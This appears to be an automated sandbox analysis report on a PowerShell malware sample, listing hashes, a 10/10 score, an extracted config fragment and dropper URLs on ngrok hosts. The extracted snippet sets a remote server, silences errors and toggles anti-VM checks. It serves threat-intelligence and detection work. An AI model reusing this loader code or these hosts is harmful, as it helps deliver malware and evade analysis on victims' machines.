General

  • Target

    eed116982d3c262a6d5b114d23ba0f70NN

  • Size

    4KB

  • MD5

    eed116982d3c262a6d5b114d23ba0f70

  • SHA1

    76165456d1d03b4eb69af945e385ff91e7778f06

  • SHA256

    efabfa6e80a7e6052a8f0b9badf690a680ec247d5eae43eaefa228a503d4c2d7

  • SHA512

    92e84db78cd9bb634726c6f6edb170adb315f8f732185a6cafe061802283b6d9a8ae2f649e803a6f27e643cd8cebf9abcc1129ab26bcdac821b40a170c358048

  • SSDEEP

    96:UzCILwBo/8badHgwlLRm6nzSmaUE8BhMD7wHFn3:UzCILwBo/V59LRbzSBrPwR3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$serverLocation = "https://mainstream.ngrok.app"
$ErrorActionPreference = 'SilentlyContinue'
$ProgressPreference = 'SilentlyContinue'
$vm_protect = $false

if ($vm_protect) {
    VMPROTECT
}

function VMPROTECT {
URLs
exe.dropper

https://mainstream.ngrok.app

exe.dropper

https://ratte.ngrok.app/Main/antivm.ps1

Signatures

Files

  • eed116982d3c262a6d5b114d23ba0f70NN
    .ps1
